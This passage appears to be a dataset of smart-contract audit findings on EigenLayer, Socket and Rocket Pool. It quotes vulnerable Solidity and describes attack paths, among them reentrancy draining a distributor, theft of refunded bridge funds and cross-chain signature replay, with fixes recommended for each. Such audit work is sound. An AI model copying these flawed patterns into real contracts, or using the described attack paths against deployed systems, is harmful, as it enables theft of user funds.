These two functions also have non-view counterparts: `sharesToUnderlying` and `underlyingToShares`, and their NatSpec documentation explicitly states that they should be allowed to make state changes. Given the scope of this engagement, it is unclear if these non-view versions are needed, but assuming they are, this does currently not work as intended.\\nFirst, the interface `IStrategy` declares `underlyingToShares` as `view` (unlike sharesToUnderlying). This means overriding this function in derived contracts is impossible without the `view` modifier. Hence, in `StrategyBase` - which implements the `IStrategy` interface - this (virtual) function is (and has to be) `view`. The same applies to overridden versions of this function in contracts inherited from `StrategyBase`.\\n```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view returns (uint256);\\n```\\n\\n```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view virtual returns (uint256) {\\n return underlyingToSharesView(amountUnderlying);\\n}\\n```\\n\\nAs 
mentioned above, the `sharesToUnderlying` function does not have the `view` modifier in the interface `IStrategy`. However, the overridden (and virtual) version in `StrategyBase` does, which means again that overriding this function in contracts inherited from `StrategyBase` is impossible without the `view` modifier.\\n```\\n/\\*\\*\\n \\* @notice Used to convert a number of shares to the equivalent amount of underlying tokens for this strategy.\\n \\* @notice In contrast to `sharesToUnderlyingView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountShares is the amount of shares to calculate its conversion into the underlying token\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction sharesToUnderlying(uint256 amountShares) public view virtual override returns (uint256) {\\n return sharesToUnderlyingView(amountShares);\\n}\\n```\\n\\nB. The `initialize` function in the `StrategyBase` contract is not virtual, which means the name will not be available in derived contracts (unless with different parameter types). It also has the `initializer` modifier, which is unavailable in concrete strategies inherited from `StrategyBase`.","A. If state-changing versions of the conversion functions are needed, the `view` modifier has to be removed from `IStrategy.underlyingToShares`, `StrategyBase.underlyingToShares`, and `StrategyBase.sharesToUnderlying`. They should be removed entirely from the interface and base contract if they're not needed.\\nB. 
Consider making the `StrategyBase` contract `abstract`, maybe give the `initialize` function a more specific name such as `_initializeStrategyBase`, change its visibility to `internal`, and use the `onlyInitializing` modifier instead of `initializer`.",,"```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view returns (uint256);\\n```\\n" +StrategyManager - Cross-Chain Replay Attacks After Chain Split Due to Hard-Coded DOMAIN_SEPARATOR,low,"A. The `StrategyManager` contract allows stakers to deposit into and withdraw from strategies. A staker can either deposit themself or have someone else do it on their behalf, where the latter requires an EIP-712-compliant signature. The EIP-712 domain separator is computed in the `initialize` function and stored in a state variable for later retrieval:\\n```\\n/// @notice EIP-712 Domain separator\\nbytes32 public DOMAIN\\_SEPARATOR;\\n```\\n\\n```\\nfunction initialize(address initialOwner, address initialStrategyWhitelister, IPauserRegistry \\_pauserRegistry, uint256 initialPausedStatus, uint256 \\_withdrawalDelayBlocks)\\n external\\n initializer\\n{\\n DOMAIN\\_SEPARATOR = keccak256(abi.encode(DOMAIN\\_TYPEHASH, bytes(""EigenLayer""), block.chainid, address(this)));\\n```\\n\\nOnce set in the `initialize` function, the value can't be changed anymore. In particular, the chain ID is “baked into” the `DOMAIN_SEPARATOR` during initialization. 
However, it is not necessarily constant: In the event of a chain split, only one of the resulting chains gets to keep the original chain ID, and the other should use a new one. With the current approach to compute the `DOMAIN_SEPARATOR` during initialization, store it, and then use the stored value for signature verification, a signature will be valid on both chains after a split - but it should not be valid on the chain with the new ID. Hence, the domain separator should be computed dynamically.\\nB. The `name` in the `EIP712Domain` is of type string:\\n```\\nbytes32 public constant DOMAIN\\_TYPEHASH =\\n keccak256(""EIP712Domain(string name,uint256 chainId,address verifyingContract)"");\\n```\\n\\nWhat's encoded when the domain separator is computed is bytes(""EigenLayer""):\\n```\\nDOMAIN\\_SEPARATOR = keccak256(abi.encode(DOMAIN\\_TYPEHASH, bytes(""EigenLayer""), block.chainid, address(this)));\\n```\\n\\nAccording to EIP-712,\\nThe dynamic values `bytes` and `string` are encoded as a `keccak256` hash of their contents.\\nHence, `bytes(""EigenLayer"")` should be replaced with `keccak256(bytes(""EigenLayer""))`.\\nC. The `EIP712Domain` does not include a version string:\\n```\\nbytes32 public constant DOMAIN\\_TYPEHASH =\\n keccak256(""EIP712Domain(string name,uint256 chainId,address verifyingContract)"");\\n```\\n\\nThat is allowed according to the specification. However, given that most, if not all, projects, as well as OpenZeppelin's EIP-712 implementation, do include a version string in their `EIP712Domain`, it might be a pragmatic choice to do the same, perhaps to avoid potential incompatibilities.","Individual recommendations have been given above. Alternatively, you might want to utilize OpenZeppelin's `EIP712Upgradeable` library, which will take care of these issues. 
Note that some of these changes will break existing signatures.",,```\\n/// @notice EIP-712 Domain separator\\nbytes32 public DOMAIN\\_SEPARATOR;\\n```\\n +StrategyManagerStorage - Miscalculated Gap Size,low,"Upgradeable contracts should have a “gap” of unused storage slots at the end to allow for adding state variables when the contract is upgraded. The convention is to have a gap whose size adds up to 50 with the used slots at the beginning of the contract's storage.\\nIn `StrategyManagerStorage`, the number of consecutively used storage slots is 10:\\n`DOMAIN_SEPARATOR`\\n`nonces`\\n`strategyWhitelister`\\n`withdrawalDelayBlocks`\\n`stakerStrategyShares`\\n`stakerStrategyList`\\n`withdrawalRootPending`\\n`numWithdrawalsQueued`\\n`strategyIsWhitelistedForDeposit`\\n`beaconChainETHSharesToDecrementOnWithdrawal`\\nHowever, the gap size in the storage contract is 41:\\n```\\nuint256[41] private \\_\\_gap;\\n```\\n","If you don't have to maintain compatibility with an existing deployment, we recommend reducing the storage gap size to 40. Otherwise, we recommend adding a comment explaining that, in this particular case, the gap size and the used storage slots should add up to 51 instead of 50 and that this invariant has to be maintained in future versions of this contract.",,```\\nuint256[41] private \\_\\_gap;\\n```\\n +Funds Refunded From Celer Bridge Might Be Stolen,high,"```\\nif (!router.withdraws(transferId)) {\\n router.withdraw(\\_request, \\_sigs, \\_signers, \\_powers);\\n}\\n```\\n\\nFrom the point of view of the Celer bridge, the initial depositor of the tokens is the `SocketGateway`. As a consequence, the Celer contract transfers the tokens to be refunded to the gateway. The gateway is then in charge of forwarding the tokens to the initial depositor. To achieve this, it keeps a mapping of unique transfer IDs to depositor addresses. 
Once a refund is processed, the corresponding address in the mapping is reset to the zero address.\\nLooking at the `withdraw` function of the Celer pool, we see that for some tokens, it is possible that the reimbursement will not be processed directly, but only after some delay. From the gateway point of view, the reimbursement will be marked as successful, and the address of the original sender corresponding to this transfer ID will be reset to address(0).\\n```\\nif (delayThreshold > 0 && wdmsg.amount > delayThreshold) {\\n _addDelayedTransfer(wdId, wdmsg.receiver, wdmsg.token, wdmsg. // <--- here\\n} else {\\n _sendToken(wdmsg.receiver, wdmsg.token, wdmsg.\\n}\\n```\\n\\nIt is then the responsibility of the user, once the locking delay has passed, to call another function to claim the tokens. Unfortunately, in our case, this means that the funds will be sent back to the gateway contract and not to the original sender. Because the gateway implements `rescueEther`, and `rescueFunds` functions, the admin might be able to send the funds back to the user. However, this requires manual intervention and breaks the trustlessness assumptions of the system. Also, in that case, there is no easy way to trace back the original address of the sender, that corresponds to this refund.\\nHowever, there is an additional issue that might allow an attacker to steal some funds from the gateway. Indeed, when claiming the refund, if it is in ETH, the gateway will have some balance when the transaction completes. Any user can then call any function that consumes the gateway balance, such as the `swapAndBridge` from `CelerImpl`, to steal the refunded ETH. That is possible as the function relies on a user-provided amount as an input, and not on `msg.value`. 
Additionally, if the refund is an ERC-20, an attacker can steal the funds by calling `bridgeAfterSwap` or `swapAndBridge` from the `Stargate` or `Celer` routes with the right parameters.\\n```\\nfunction bridgeAfterSwap(\\n uint256 amount,\\n bytes calldata bridgeData\\n) external payable override {\\n CelerBridgeData memory celerBridgeData = abi.decode(\\n bridgeData,\\n (CelerBridgeData)\\n );\\n```\\n\\n```\\nfunction swapAndBridge(\\n uint32 swapId,\\n bytes calldata swapData,\\n StargateBridgeDataNoToken calldata stargateBridgeData\\n```\\n\\nNote that this violates the security assumption: “The contracts are not supposed to hold any funds post-tx execution.”",Make sure that `CelerImpl` supports also the delayed withdrawals functionality and that withdrawal requests are deleted only if the receiver has received the withdrawal in a single transaction.,,"```\\nif (!router.withdraws(transferId)) {\\n router.withdraw(\\_request, \\_sigs, \\_signers, \\_powers);\\n}\\n```\\n" +Calls Made to Non-Existent/Removed Routes or Controllers Will Not Result in Failure,high,"This issue was found in commit hash `a8d0ad1c280a699d88dc280d9648eacaf215fb41`.\\nIn the Ethereum Virtual Machine (EVM), `delegatecall` will succeed for calls to externally owned accounts and more specifically to the zero address, which presents a potential security risk. 
We have identified multiple instances of `delegatecall` being used to invoke smart contract functions.\\nThis, combined with the fact that routes can be removed from the system by the owner of the `SocketGateway` contract using the `disableRoute` function, makes it possible for the user's funds to be lost in case an `executeRoute` transaction (for instance) that's waiting in the mempool is eventually front-run by a call to `disableRoute`.\\n```\\n(bool success, bytes memory result) = addressAt(routeId).delegatecall(\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(data);\\n```\\n\\nEven after the upgrade to commit hash `d0841a3e96b54a9d837d2dba471aa0946c3c8e7b`, the following bug is still present:\\nTo optimize gas usage, the `addressAt` function in `socketGateway` uses a binary search in a hard-coded table to resolve a `routeID` (routeID <= 512) to a contract address. This is made possible thanks to the factory using the `CREATE2` pattern. This allows pre-computing future addresses of contracts before they are deployed. In case the `routeID` is strictly greater than 512, `addressAt` falls back to fetching the address from a state mapping (routes).\\nThe new commit hash adds a check to make sure that the call to the `addressAt` function reverts in case a `routeID` is not present in the `routes` mapping. This prevents delegate-calling to non-existent addresses in various places of the code. However, this does not solve the issue for the hard-coded route addresses (i.e., `routeID` <= 512). In that case, the `addressAt` function still returns a valid route contract address, despite the contract not being deployed yet. 
This will result in a successful `delegatecall` later in the code and might lead to various side-effects.\\n```\\nfunction addressAt(uint32 routeId) public view returns (address) {\\n if (routeId < 513) {\\n if (routeId < 257) {\\n if (routeId < 129) {\\n if (routeId < 65) {\\n if (routeId < 33) {\\n if (routeId < 17) {\\n if (routeId < 9) {\\n if (routeId < 5) {\\n if (routeId < 3) {\\n if (routeId == 1) {\\n return\\n 0x822D4B4e63499a576Ab1cc152B86D1CFFf794F4f;\\n } else {\\n return\\n 0x822D4B4e63499a576Ab1cc152B86D1CFFf794F4f;\\n }\\n } else {\\n```\\n\\n```\\nif (routes[routeId] == address(0)) revert ZeroAddressNotAllowed();\\nreturn routes[routeId];\\n```\\n","Consider adding a check to validate that the callee of a `delegatecall` is indeed a contract, you may refer to the Address library by OZ.",,"```\\n(bool success, bytes memory result) = addressAt(routeId).delegatecall(\\n```\\n" +Owner Can Add Arbitrary Code to Be Executed From the SocketGateway Contract,medium,"The Socket system is managed by the `SocketGateway` contract that maintains all routes and controller addresses within its state. There, the address with the `Owner` role of the `SocketGateway` contract can add new routes and controllers that would have a `delegatecall()` executed upon them from the `SocketGateway` so user transactions can go through the logic required for the bridge, swap, or any other solution integrated with Socket. These routes and controllers would then have arbitrary code that is entirely up to the `Owner`, though users are not required to go through any specific routes and can decide which routes to pick.\\nSince these routes are called via `delegatecall()`, they don't hold any storage variables that would be used in the Socket systems. However, as Socket aggregates more solutions, unexpected complexities may arise that could require storing and accessing variables through additional contracts. 
Those contracts would be access control protected to only have the `SocketGateway` contract have the privileges to modify its variables.\\nThis together with the `Owner` of the `SocketGateway` being able to add routes with arbitrary code creates an attack vector where a compromised address with `Owner` privileges may add a route that would contain code that exploits the special privileges assigned to the `SocketGateway` contract for their benefit.\\nFor example, the Celer bridge needs extra logic to account for its refund mechanism, so there is an additional `CelerStorageWrapper` contract that maintains a mapping between individual bridge transfer transactions and their associated msg.sender:\\n```\\ncelerStorageWrapper.setAddressForTransferId(transferId, msg.sender);\\n```\\n\\n```\\n/\\*\\*\\n \\* @title CelerStorageWrapper\\n \\* @notice handle storageMappings used while bridging ERC20 and native on CelerBridge\\n \\* @dev all functions ehich mutate the storage are restricted to Owner of SocketGateway\\n \\* @author Socket dot tech.\\n \\*/\\ncontract CelerStorageWrapper {\\n```\\n\\nConsequently, this contract has access-protected functions that may only be called by the SocketGateway to set and delete the transfer IDs:\\n```\\nfunction setAddressForTransferId(\\n```\\n\\n```\\nfunction deleteTransferId(bytes32 transferId) external {\\n```\\n\\nA compromised `Owner` of SocketGateway could then create a route that calls into the `CelerStorageWrapper` contract and updates the transfer IDs associated addresses to be under their control via `deleteTransferId()` and `setAddressForTransferId()` functions. This could create a significant drain of user funds, though, it depends on a compromised privileged `Owner` address.","Although it may indeed be unlikely, for aggregating solutions it is especially important to try and minimize compromised access issues. 
As future solutions require more complexity, consider architecting their integrations in such a way that they require as few administrative and SocketGateway-initiated transactions as possible. Through conversations with the Socket team, it appears that solutions such as timelocks on adding new routes are being considered as well, which would help catch the problem before it appears as well.",,"```\\ncelerStorageWrapper.setAddressForTransferId(transferId, msg.sender);\\n```\\n" +Dependency on Third-Party APIs to Create the Right Payload,medium,"The Socket system of routes and controllers integrates swaps, bridges, and potentially other solutions that are vastly different from each other. The function arguments that are required to execute them may often seem like a black box of a payload for a typical end user. In fact, even when users explicitly provide a destination `token` with an associated `amount` for a swap, these arguments themselves might not even be fully (or at all) used in the route itself. Instead, often the routes and controllers accept a `bytes` payload that contains all the necessary data for its action. These data payloads are generated off-chain, often via centralized APIs provided by the integrated systems themselves, which is understandable in isolation as they have to be generated somewhere at some point. However, the provided `bytes` do not get checked for their correctness or matching with the other arguments that the user explicitly provided. Even the events that get emitted refer to the individual arguments of functions as opposed to what actually was being used to execute the logic.\\nFor example, the implementation route for the 1inch swaps explicitly asks the user to provide `fromToken`, `toToken`, `amount`, and `receiverAddress`, however only `fromToken` and `amount` are used meaningfully to transfer the `amount` to the SocketGateway and approve the `fromToken` to be spent by the 1inch contract. 
Everything else is dictated by `swapExtraData`, including even the true `amount` that is getting swapped. A mishap in the API providing this data payload could cause much less of a token `amount` to be swapped, a wrong address to receive the swap, and even the wrong destination token to return.\\n```\\n// additional data is generated in off-chain using the OneInch API which takes in\\n// fromTokenAddress, toTokenAddress, amount, fromAddress, slippage, destReceiver, disableEstimate\\n(bool success, bytes memory result) = ONEINCH\\_AGGREGATOR.call(\\n swapExtraData\\n);\\n```\\n\\nEven the event at the end of the transaction partially refers to the explicitly provided arguments instead of those that actually facilitated the execution of logic\\n```\\nemit SocketSwapTokens(\\n fromToken,\\n toToken,\\n returnAmount,\\n amount,\\n OneInchIdentifier,\\n receiverAddress\\n);\\n```\\n\\nAs Socket aggregates other solutions, it naturally incurs the trust assumptions and risks associated with its integrations. In some ways, they even stack on top of each other, especially in those Socket functions that batch several routes together - all of them and their associated API calls need to return the correct payloads. So, there is an opportunity to minimize these risks by introducing additional checks into the contracts that would verify the correctness of the payloads that are passed over to the routes and controllers. 
In fact, creating these payloads within the contracts would allow other systems to integrate Socket more simpler as they could just call the functions with primary logical arguments such as the source token, destination token, and amount.","Consider allocating additional checks within the route implementations that ensure that the explicitly passed arguments match what is being sent for execution to the integrated solutions, like in the above example with the 1inch implementation.",,"```\\n// additional data is generated in off-chain using the OneInch API which takes in\\n// fromTokenAddress, toTokenAddress, amount, fromAddress, slippage, destReceiver, disableEstimate\\n(bool success, bytes memory result) = ONEINCH\\_AGGREGATOR.call(\\n swapExtraData\\n);\\n```\\n" +NativeOptimismImpl - Events Will Not Be Emitted in Case of Non-Native Tokens Bridging,medium,"In the case of the usage of non-native tokens by users, the `SocketBridge` event will not be emitted since the code will return early.\\n```\\nfunction bridgeAfterSwap(\\n```\\n\\n```\\nfunction swapAndBridge(\\n```\\n\\n```\\nfunction bridgeERC20To(\\n```\\n",Make sure that the `SocketBridge` event is emitted for non-native tokens as well.,,```\\nfunction bridgeAfterSwap(\\n```\\n +Inconsistent Comments,low,"Some of the contracts in the code have incorrect developer comments annotated for them. This could create confusion for future readers of this code that may be trying to maintain, audit, update, fork, integrate it, and so on.\\n```\\n/\\*\\*\\n \\* @notice function to bridge tokens after swap. 
This is used after swap function call\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in Stargate-BridgeData struct\\n \\* @param swapId routeId for the swapImpl\\n \\* @param swapData encoded data for swap\\n \\* @param stargateBridgeData encoded data for StargateBridgeData\\n \\*/\\nfunction swapAndBridge(\\n```\\n\\nThis is the same comment as `bridgeAfterSwap`, whereas it instead does swapping and bridging together\\n```\\n/\\*\\*\\n \\* @notice function to store the transferId and message-sender of a bridging activity\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in CelerBridgeData struct\\n \\* @param transferId transferId generated during the bridging of ERC20 or native on CelerBridge\\n \\* @param transferIdAddress message sender who is making the bridging on CelerBridge\\n \\*/\\nfunction setAddressForTransferId(\\n```\\n\\nThis comment refers to a payable property of this function when it isn't.\\n```\\n/\\*\\*\\n \\* @notice function to store the transferId and message-sender of a bridging activity\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in CelerBridgeData struct\\n \\* @param transferId transferId generated during the bridging of ERC20 or native on CelerBridge\\n \\*/\\nfunction deleteTransferId(bytes32 transferId) external {\\n```\\n\\nThis comment is copied from the above function when it does the opposite of storing - it deletes the `transferId`",Adjust comments so they reflect what the functions 
are actually doing.,,"```\\n/\\*\\*\\n \\* @notice function to bridge tokens after swap. This is used after swap function call\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in Stargate-BridgeData struct\\n \\* @param swapId routeId for the swapImpl\\n \\* @param swapData encoded data for swap\\n \\* @param stargateBridgeData encoded data for StargateBridgeData\\n \\*/\\nfunction swapAndBridge(\\n```\\n" +Unused Error Codes.,low,"`error RouteAlreadyExist();`\\n`error ContractContainsNoCode();`\\n`error ControllerAlreadyExist();`\\n`error ControllerAddressIsZero();`\\nIt seems that they were created as errors that may have been expected to occur during the early stages of development, but the resulting architecture doesn't seem to have a place for them currently.\\n```\\nerror RouteAlreadyExist();\\nerror SwapFailed();\\nerror UnsupportedInterfaceId();\\nerror ContractContainsNoCode();\\nerror InvalidCelerRefund();\\nerror CelerAlreadyRefunded();\\nerror ControllerAlreadyExist();\\nerror ControllerAddressIsZero();\\n```\\n",Resolution\\nRemediated as per the client team in SocketDotTech/socket-ll-contracts#148.\\nConsider revisiting these errors and identifying whether they need to remain or can be removed.,,```\\nerror RouteAlreadyExist();\\nerror SwapFailed();\\nerror UnsupportedInterfaceId();\\nerror ContractContainsNoCode();\\nerror InvalidCelerRefund();\\nerror CelerAlreadyRefunded();\\nerror ControllerAlreadyExist();\\nerror ControllerAddressIsZero();\\n```\\n +Inaccurate Interface.,low,"`ISocketGateway` implies a `bridge(uint32 routeId, bytes memory data)` function, but there is no socket contract with a function like that, including the `SocketGateway` contract.\\n```\\nfunction bridge(\\n uint32 routeId,\\n bytes memory data\\n) external payable returns (bytes 
memory);\\n```\\n",Adjust the interface.,,"```\\nfunction bridge(\\n uint32 routeId,\\n bytes memory data\\n) external payable returns (bytes memory);\\n```\\n" +Validate Array Length Matching Before Execution to Avoid Reverts,low,"The Socket system not only aggregates different solutions via its routes and controllers but also allows to batch calls between them into one transaction. For example, a user may call swaps between several DEXs and then perform a bridge transfer.\\nAs a result, the `SocketGateway` contract has many functions that accept multiple arrays that contain the necessary data for execution in their respective routes. However, these arrays need to be of the same length because individual elements in the arrays are intended to be matched at the same indices:\\n```\\nfunction executeRoutes(\\n uint32[] calldata routeIds,\\n bytes[] calldata dataItems,\\n bytes[] calldata eventDataItems\\n) external payable {\\n uint256 routeIdslength = routeIds.length;\\n for (uint256 index = 0; index < routeIdslength; ) {\\n (bool success, bytes memory result) = addressAt(routeIds[index])\\n .delegatecall(dataItems[index]);\\n\\n if (!success) {\\n assembly {\\n revert(add(result, 32), mload(result))\\n }\\n }\\n\\n emit SocketRouteExecuted(routeIds[index], eventDataItems[index]);\\n\\n unchecked {\\n ++index;\\n }\\n }\\n}\\n```\\n\\nNote that in the above example function, all 3 different calldata arrays `routeIds`, `dataItems`, and `eventDataItems` were utilizing the same `index` to retrieve the correct element. 
A common practice in such cases is to confirm that the sizes of the arrays match before continuing with the execution of the rest of the transaction to avoid costly reverts that could happen due to “Index out of bounds” error.\\nDue to the aggregating and batching nature of the Socket system that may have its users rely on 3rd party offchain APIs to construct these array payloads, such as from APIs of the systems that Socket is integrating, a mishap in just any one of them could cause this issue.",Implement a check on the array lengths so they match.,,"```\\nfunction executeRoutes(\\n uint32[] calldata routeIds,\\n bytes[] calldata dataItems,\\n bytes[] calldata eventDataItems\\n) external payable {\\n uint256 routeIdslength = routeIds.length;\\n for (uint256 index = 0; index < routeIdslength; ) {\\n (bool success, bytes memory result) = addressAt(routeIds[index])\\n .delegatecall(dataItems[index]);\\n\\n if (!success) {\\n assembly {\\n revert(add(result, 32), mload(result))\\n }\\n }\\n\\n emit SocketRouteExecuted(routeIds[index], eventDataItems[index]);\\n\\n unchecked {\\n ++index;\\n }\\n }\\n}\\n```\\n" +Destroyed Routes Eth Balances Will Be Left Locked in SocketDeployFactory,low,"`SocketDeployFactory.destroy` calls the `killme` function which in turn self-destructs the route and sends back any eth to the factory contract. However, these funds can not be claimed from the `SocketDeployFactory` contract.\\n```\\nfunction destroy(uint256 routeId) external onlyDisabler {\\n```\\n",Make sure that these funds can be claimed.,,```\\nfunction destroy(uint256 routeId) external onlyDisabler {\\n```\\n +RocketNodeDistributorDelegate - Reentrancy in distribute() allows node owner to drain distributor funds,high,"The `distribute()` function distributes the contract's balance between the node operator and the user. The node operator is returned their initial collateral, including a fee. 
The rest is returned to the RETH token contract as user collateral.\\nAfter determining the node owner's share, the contract transfers `ETH` to the node withdrawal address, which can be the configured withdrawal address or the node address. Both addresses may potentially be a malicious contract that recursively calls back into the `distribute()` function to retrieve the node share multiple times until all funds are drained from the contract. The `distribute()` function is not protected against reentrancy:\\n```\\n/// @notice Distributes the balance of this contract to its owners\\nfunction distribute() override external {\\n // Calculate node share\\n uint256 nodeShare = getNodeShare();\\n // Transfer node share\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n (bool success,) = withdrawalAddress.call{value : nodeShare}("""");\\n require(success);\\n // Transfer user share\\n uint256 userShare = address(this).balance;\\n address rocketTokenRETH = rocketStorage.getAddress(rocketTokenRETHKey);\\n payable(rocketTokenRETH).transfer(userShare);\\n // Emit event\\n emit FeesDistributed(nodeAddress, userShare, nodeShare, block.timestamp);\\n}\\n```\\n\\nWe also noticed that any address could set a withdrawal address as there is no check for the caller to be a registered node. 
In fact, the caller can be the withdrawal address or node operator.\\n```\\n// Set a node's withdrawal address\\nfunction setWithdrawalAddress(address \\_nodeAddress, address \\_newWithdrawalAddress, bool \\_confirm) external override {\\n // Check new withdrawal address\\n require(\\_newWithdrawalAddress != address(0x0), ""Invalid withdrawal address"");\\n // Confirm the transaction is from the node's current withdrawal address\\n address withdrawalAddress = getNodeWithdrawalAddress(\\_nodeAddress);\\n require(withdrawalAddress == msg.sender, ""Only a tx from a node's withdrawal address can update it"");\\n // Update immediately if confirmed\\n if (\\_confirm) {\\n updateWithdrawalAddress(\\_nodeAddress, \\_newWithdrawalAddress);\\n }\\n // Set pending withdrawal address if not confirmed\\n else {\\n pendingWithdrawalAddresses[\\_nodeAddress] = \\_newWithdrawalAddress;\\n }\\n}\\n```\\n","Resolution\\nFixed in https://github.com/rocket-pool/rocketpool/tree/77d7cca65b7c0557cfda078a4fc45f9ac0cc6cc6 by implementing a custom reentrancy guard via a new state variable `lock` that is appended to the end of the storage layout. The reentrancy guard is functionally equivalent to the OpenZeppelin implementation. The method was not refactored to give user funds priority over the node share. Additionally, the client provided the following statement:\\nWe acknowledge this as a critical issue and have solved with a reentrancy guard.\\nWe followed OpenZeppelin's design for a reentrancy guard. We were unable to use it directly as it is hardcoded to use storage slot 0 and because we already have deployment of this delegate in the wild already using storage slot 0 for another purpose, we had to append it to the end of the existing storage layout.\\nAdd a reentrancy guard to functions that interact with untrusted contracts. Adhere to the checks-effects pattern and send user funds to the ‘trusted' RETH contract first. 
Only then send funds to the node's withdrawal address.",,"```\\n/// @notice Distributes the balance of this contract to its owners\\nfunction distribute() override external {\\n // Calculate node share\\n uint256 nodeShare = getNodeShare();\\n // Transfer node share\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n (bool success,) = withdrawalAddress.call{value : nodeShare}("""");\\n require(success);\\n // Transfer user share\\n uint256 userShare = address(this).balance;\\n address rocketTokenRETH = rocketStorage.getAddress(rocketTokenRETHKey);\\n payable(rocketTokenRETH).transfer(userShare);\\n // Emit event\\n emit FeesDistributed(nodeAddress, userShare, nodeShare, block.timestamp);\\n}\\n```\\n" +RocketMinipoolDelegateOld - Node operator may reenter finalise() to manipulate accounting,high,"In the old Minipool delegate contract, a node operator may call the `finalise()` function to finalize a Minipool. As part of this process, a call to `_refund()` may be performed if there is a node refund balance to be transferred. This will send an amount of `nodeRefundBalance` in ETH to the `nodeWithdrawalAddress` via a low-level call, handing over control flow to an - in terms of the system - untrusted external account that this node operator controls. 
The node operator, therefore, is granted to opportunity to call back into `finalise()`, which is not protected against reentrancy and violates the checks-effects-interactions pattern (finalised = true is only set at the very end), to manipulate the following system settings:\\nnode.minipools.finalised.count: NodeAddress finalised count increased twice instead\\nminipools.finalised.count: global finalised count increased twice\\n`eth.matched.node.amount` - NodeAddress eth matched amount potentially reduced too many times; has an impact on `getNodeETHCollateralisationRatio -> GetNodeShare`, `getNodeETHProvided -> getNodeEffectiveRPLStake` and `getNodeETHProvided->getNodeMaximumRPLStake->withdrawRPL` and is the limiting factor when withdrawing RPL to ensure the pools stay collateralized.\\nNote: `RocketMinipoolDelegateOld` is assumed to be the currently deployed MiniPool implementation. Users may upgrade from this delegate to the new version and can roll back at any time and re-upgrade, even within the same transaction (see issue 5.3 ).\\nThe following is an annotated call stack from a node operator calling `minipool.finalise()` reentering `finalise()` once more on their Minipool:\\n```\\nfinalise() --> \\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n _refund()\\n nodeRefundBalance = 0 //<-- reset refund balance\\n ---> extCall: nodeWithdrawalAddress\\n ---> reenter: finalise()\\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n nodeRefundBalance > 0 //<-- false; no refund()\\n address(this).balance to RETH\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral()\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress) //<-- 1st time\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); \\n finalised = true;\\n <--- return from reentrant 
call\\n <--- return from _refund()\\n address(this).balance to RETH //<-- NOP as balance was sent to RETH already\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral(); //<-- does not revert\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress); //<-- no revert, increases\\n 'node.minipools.finalised.count', 'minipools.finalised.count', reduces 'eth.matched.node.amount' one to\\n many times\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); //<-- manipulates\\n 'member.validator.unbonded.count' by +1\\n finalised = true; //<-- is already 'true', gracefully continues\\n<--- returns \\n```\\n\\n```\\n// Called by node operator to finalise the pool and unlock their RPL stake\\nfunction finalise() external override onlyInitialised onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) {\\n // Can only call if withdrawable and can only be called once\\n require(status == MinipoolStatus.Withdrawable, ""Minipool must be withdrawable"");\\n // Node operator cannot finalise the pool unless distributeBalance has been called\\n require(withdrawalBlock > 0, ""Minipool balance must have been distributed at least once"");\\n // Finalise the pool\\n \\_finalise();\\n}\\n```\\n\\n`_refund()` handing over control flow to `nodeWithdrawalAddress`\\n```\\n// Perform any slashings, refunds, and unlock NO's stake\\nfunction \\_finalise() private {\\n // Get contracts\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n // Can only finalise the pool once\\n require(!finalised, ""Minipool has already been finalised"");\\n // If slash is required then perform it\\n if (nodeSlashBalance > 0) {\\n \\_slash();\\n }\\n // Refund node operator if required\\n if (nodeRefundBalance > 0) {\\n \\_refund();\\n }\\n // Send any left over ETH to rETH contract\\n if (address(this).balance > 0) {\\n // Send user amount to rETH contract\\n 
